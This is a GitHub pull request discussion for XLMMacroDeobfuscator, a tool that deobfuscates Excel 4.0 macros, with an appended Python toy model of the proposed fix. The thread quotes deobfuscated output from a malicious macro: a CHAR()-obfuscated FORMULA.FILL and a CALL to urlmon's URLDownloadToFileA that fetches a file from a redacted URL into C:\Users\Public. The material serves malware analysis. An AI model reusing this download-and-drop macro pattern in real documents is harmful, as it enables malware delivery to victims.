DissectMalware / XLMMacroDeobfuscator

Extract and Deobfuscate XLM macros (a.k.a Excel 4.0 Macros)
Apache License 2.0
568 stars, 115 forks

Add GET.WINDOW, add cmpops lt and gt #22

Closed spencerwp closed 4 years ago

spencerwp commented 4 years ago

Add empty window defaults and GET.WINDOW support. Add comparison operators < and >.

Add _cell_defaults.

Rename defauls to defaults.

spencerwp commented 4 years ago

For some reason the return for comparison from GET.WINDOW only ever came back as a float if the "text" field was set to the response value from get_window.

DissectMalware commented 4 years ago

It seems get_cell.conf is not added and committed.

Are you going to use it for missing cell formatting info?

spencerwp commented 4 years ago

The get_cell.conf was already in there, but loading was overwriting the workspace_defaults; I fixed the var name only.

DissectMalware commented 4 years ago

My bad, I forgot I added it!

spencerwp commented 4 years ago

I added another change to allow re-parsing of formulas that were filled by FORMULA.FILL(CHAR(xx)&CHAR(xx)&(CHAR(xx)) methods. This will happen in evaluate_parse_tree only when cell.value is None.

doomedraven commented 4 years ago

Ah nice, I had opened an issue to ask about this CHAR thing.

DissectMalware commented 4 years ago

This is true for FORMULA as well: if the destination is not set then it will set the next cell, I guess.

Are we talking about FORMULA.FILL having only one argument?

Or you are pointing to something else?

Oh, I get what you are saying. You are saying that if the cell is accessed, we need to also evaluate the formula. But when we access a formula, we get its value. The formula shouldn't be executed at this point. Only when the interpreter processes the cell should the macro be evaluated.

spencerwp commented 4 years ago

Sorry, nothing to do with one argument.

I saw a problem where this

=FORMULA.FILL(CHAR(CO14877/BF53864)&CHAR(HF51138*GU60692)&CHAR(BJ47128-IR50627)&CHAR(CO14877-FB3970)&.....&CHAR(FJ58289+FL28871),GK50662)

will become this

CELL:IE62618 , FullEvaluation , FORMULA.FILL("=""C:\Users\Public\EIKiJM.html""",Sheet2!GK50662)

Then another function will try to reference the string by cell, GK50662, and it will find the cell.value is not set, only the cell.formula. So this change can re-evaluate the formula even if there was not a GOTO GK50662 before its use.

I used to get

CELL:FJ4659 , NotImplemented , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,CD53145,GK50662,0,0)

Now I get

CELL:FJ4659 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://xxx/xxx.php","C:\Users\Public\EIKiJM.html",0,0)

Maybe strings are a special case?
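The lazy re-parse spencerwp describes, as an added example that is not part of the original thread or of XLMMacroDeobfuscator's own code: a toy cell model in which FORMULA.FILL writes a CHAR()-built formula into a destination cell without executing it, and a later formula that reads that cell either sees an unresolved reference (pre-patch behaviour, `lazy_eval=False`) or triggers evaluation of the filled formula on first access (`lazy_eval=True`). The parser, the `Ref`/`Cell` types, the status labels and every cell value are constructed for this example; only the cell references and the CALL shape are taken from the thread.

```python
"""Toy model of the lazy re-parse discussed in this PR: a cell whose formula was
written by FORMULA.FILL but never executed is evaluated the first time another
formula reads its value. Toy code, not XLMMacroDeobfuscator's parser."""
import re
from dataclasses import dataclass
from typing import Optional

# One token per match: string literal, number, A1-style cell ref, function
# name (must be followed by '('), or a single-character operator.
_TOKEN = re.compile(
    r'\s*(?:("(?:[^"]|"")*")|(\d+(?:\.\d+)?)|([A-Z]{1,3}\d+)'
    r'|([A-Z][A-Z.]*)(?=\()|([<>&+\-*/(),]))')


def _text(v):
    """Excel-style text of a value: 61.0 -> '61', strings unchanged."""
    return str(int(v)) if isinstance(v, float) and v.is_integer() else str(v)


# Operator tables, lowest precedence first: comparison, '&', + -, * /.
_CMP = {'<': lambda a, b: a < b, '>': lambda a, b: a > b}
_CAT = {'&': lambda a, b: _text(a) + _text(b)}
_ADD = {'+': lambda a, b: a + b, '-': lambda a, b: a - b}
_MUL = {'*': lambda a, b: a * b, '/': lambda a, b: a / b}


@dataclass
class Cell:
    formula: Optional[str] = None  # formula text, e.g. '="C:\\"'
    value: object = None           # stays None until the formula has run


@dataclass(frozen=True)
class Ref:
    name: str                      # a not-yet-resolved cell reference


class MiniXlm:
    def __init__(self, lazy_eval=True):
        self.cells, self.toks, self.i = {}, [], 0
        self.lazy_eval = lazy_eval  # False reproduces the pre-patch behaviour

    def cell(self, ref):
        return self.cells.setdefault(ref, Cell())

    def set_value(self, ref, value):
        self.cell(ref).value = value

    def resolve(self, v):
        """Turn a Ref into its cell value; this is where the patch's change lives."""
        if not isinstance(v, Ref):
            return v
        c = self.cell(v.name)
        if c.value is None and c.formula is not None and self.lazy_eval:
            c.value = self.evaluate(c.formula)  # re-parse the filled formula now
        return v if c.value is None else c.value  # unknown cells stay Refs

    def tokenize(self, text):
        pos, toks = 0, []
        while pos < len(text):
            m = _TOKEN.match(text, pos)
            if m is None:
                raise ValueError(f'bad token near {text[pos:pos + 12]!r}')
            pos = m.end()
            s, n, r, f, op = m.groups()
            if s is not None:
                toks.append(('str', s[1:-1].replace('""', '"')))
            elif n is not None:
                toks.append(('num', float(n)))
            elif r is not None:
                toks.append(('ref', r))
            elif f is not None:
                toks.append(('fn', f))
            else:
                toks.append(('op', op))
        return toks

    def evaluate(self, formula):
        """Parse and evaluate one formula; re-entrant so resolve() can nest."""
        saved = (self.toks, self.i)
        self.toks, self.i = self.tokenize(formula.strip().lstrip('=')), 0
        try:
            v = self.cmp()
            if self.i != len(self.toks):
                raise ValueError('trailing tokens')
        finally:
            self.toks, self.i = saved
        return v

    def peek(self):
        return self.toks[self.i] if self.i < len(self.toks) else ('end', None)

    def take(self):
        t = self.peek()
        self.i += 1
        return t

    def expect(self, op):
        if self.take() != ('op', op):
            raise ValueError(f'expected {op!r}')

    def binary(self, ops, operand):
        v = operand()
        while self.peek()[0] == 'op' and self.peek()[1] in ops:
            fn = ops[self.take()[1]]
            v = fn(self.resolve(v), self.resolve(operand()))
        return v

    def cmp(self): return self.binary(_CMP, self.concat)
    def concat(self): return self.binary(_CAT, self.add)
    def add(self): return self.binary(_ADD, self.mul)
    def mul(self): return self.binary(_MUL, self.primary)

    def primary(self):
        kind, val = self.take()
        if kind in ('str', 'num'):
            return val
        if kind == 'ref':
            return Ref(val)  # resolved lazily, only when a value is needed
        if (kind, val) == ('op', '('):
            v = self.cmp()
            self.expect(')')
            return v
        if kind == 'fn':
            self.expect('(')
            args = []
            if self.peek() != ('op', ')'):
                args.append(self.cmp())
                while self.peek() == ('op', ','):
                    self.take()
                    args.append(self.cmp())
            self.expect(')')
            return self.call(val, args)
        raise ValueError(f'unexpected token {kind} {val!r}')

    def call(self, name, args):
        if name == 'CHAR':
            return chr(int(self.resolve(args[0])))
        if name == 'FORMULA.FILL':
            # Write the formula text into the destination cell; its value stays
            # None because nothing has executed that formula yet.
            text, dest = _text(self.resolve(args[0])), args[1]
            self.cell(dest.name).formula = text
            return text
        if name == 'CALL':
            # Status labels mirror the deobfuscator output quoted in the thread.
            resolved = [self.resolve(a) for a in args]
            status = ('NotImplemented' if any(isinstance(a, Ref) for a in resolved)
                      else 'FullEvaluation')
            return status, resolved
        raise NotImplementedError(name)


def demo(lazy_eval):
    """Constructed reproduction of the thread's case (all cell values made up)."""
    x = MiniXlm(lazy_eval)
    for ref, v in {'CO14877': 122.0, 'BF53864': 2.0, 'HF51138': 17.0,
                   'GU60692': 2.0, 'BJ47128': 100.0, 'IR50627': 33.0,
                   'FB3970': 64.0, 'FJ58289': 90.0, 'FL28871': 2.0,
                   'CD53145': 'https://xxx/xxx.php'}.items():
        x.set_value(ref, v)
    # The CHAR() chain yields '="C:\"' (codes 61,34,67,58,92,34) and fills it
    # into GK50662 without executing it.
    x.evaluate('=FORMULA.FILL(CHAR(CO14877/BF53864)&CHAR(HF51138*GU60692)'
               '&CHAR(BJ47128-IR50627)&CHAR(CO14877-FB3970)'
               '&CHAR(FJ58289+FL28871)&CHAR(HF51138*GU60692),GK50662)')
    assert x.cell('GK50662').value is None  # filled, not yet executed
    # The next formula reads GK50662 with no GOTO having executed it.
    return x.evaluate('=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,'
                      'CD53145,GK50662,0,0)')
```

Running `demo(False)` returns the CALL with `Ref(name='GK50662')` still in the argument list and status `NotImplemented`; `demo(True)` resolves it to `C:\` and reports `FullEvaluation`, which is the before/after contrast from the comment above. The resolution is deliberately placed in `resolve()` rather than in FORMULA.FILL, so a filled formula is still executed only once, on first read, and the interpreter's normal cell-by-cell evaluation is unchanged.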